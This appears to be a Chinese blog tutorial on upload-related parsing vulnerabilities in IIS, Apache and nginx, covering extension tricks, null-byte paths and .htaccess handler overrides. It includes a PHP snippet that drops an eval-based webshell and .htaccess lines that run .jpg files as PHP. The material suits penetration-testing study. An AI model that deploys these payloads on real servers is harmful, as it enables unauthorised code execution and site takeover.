上传漏洞之解析漏洞

文件解析漏洞:一些特殊文件被iis,Apache,nginx在某种情况下解释成脚本文件格式的漏洞

iis5.x&6.0的漏洞

1.目录解析漏洞:/xxx.asp/ma.jpg

  • 在网站下建立的名字为.asp,.asa文件夹,在目录内的任何文件都会被当做asp文件进行解析并执行,如果可以控制上传的路径,那么就不需要上传后将jpg改名就可以拿到shell。
    2.文件解析漏洞:1.asp;.jpg
  • 上传的时候,因为尾部是jpg,所以上传成功,执行的时候分号后面的都不执行,所以是当做asp执行(抓包改包)

Apache解析漏洞

  • Apache是从右向左进行解析,如果不可识别就继续向左识别
  • 例如1.php.owf.rar,Apache不可识别owf和rar,那这个文件就会被当做php执行
  • 如何判断是不是合法后缀:测试时上传一个1.php.rar.jpg…(把知道的后缀都加上)去测试是否合法

iis7.0/7.5/nginx<8.03畸形解析漏洞

  • 上传一个名字为1.jpg的文件内容为
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
  • 访问1.jpg/.php,在这个目录下就会生产一句话木马xxx.php

nginx<8.03空字节代码执行漏洞

  • 在图片中嵌入php代码
  • 通过访问xxx.jpg%00.php来执行

Apache的.htaccess文件解析漏洞

如果测试中发现.htaccess文件可被上传和执行,那么机会就来了。
创建一个1.txt中写入如下代码,打开另存为,保存类型为所有文件

AddType  application/x-httpd-php    .jpg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

.htaccess文件里的代码的含义是将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件。

发布了13 篇原创文章 · 获赞 0 · 访问量 440

猜你喜欢

转载自blog.csdn.net/m0_46230316/article/details/105301090